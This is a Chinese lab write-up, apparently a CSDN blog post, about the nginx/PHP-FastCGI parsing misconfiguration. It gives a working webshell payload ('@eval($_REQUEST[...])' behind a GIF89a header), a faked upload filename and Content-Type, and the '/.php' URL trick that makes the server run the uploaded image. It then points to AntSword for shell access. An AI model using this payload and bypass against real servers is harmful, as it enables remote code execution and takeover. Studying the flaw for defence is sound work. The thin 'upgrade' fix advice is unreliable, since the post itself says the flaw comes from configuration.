nginx解析漏洞

nginx_解析漏洞

说明内容
漏洞编号
漏洞名称nginx 解析漏洞
漏洞评级高危
影响范围该漏洞与nginx、php版本无关,属于用户配置不当造成的解析漏洞
漏洞描述可以通过绕过上传图片马
修复方案升级

漏洞描述

由于nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.php’),其中test.png是我们上传的包含PHP代码的照片文件。

漏洞等级

高危

影响版本

  • 该漏洞与nginx、php版本无关,属于用户配置不当造成的解析漏洞

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
Source Code

漏洞扫描

漏洞验证

  1. 开启环境,访问主页

    在这里插入图片描述

  2. 选择一句话木马+phpinfo上传,进行抓包

    在这里插入图片描述

  3. 修改文件名

    filename="1.php.png"
    

    在这里插入图片描述

  4. 修改文件类型

    Content-Type: image/png
    

    在这里插入图片描述

  5. 修改文件内容

    GIF89a
    <?php @eval($_REQUEST[333]);phpinfo()?>
    

    在这里插入图片描述

  6. 访问文件

    http://192.168.117.163/uploadfiles/588c7f4a8707b25751914e6f95379049.png
    

    在这里插入图片描述

  7. 修改url

    http://192.168.117.163/uploadfiles/588c7f4a8707b25751914e6f95379049.png/.php
    

    在这里插入图片描述

深度利用

GetShell

当漏洞验证成功时,证明一句话木马已经成功执行,可以直接上蚁剑进行连接

漏洞挖掘

网络测绘

nginx

修复建议

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值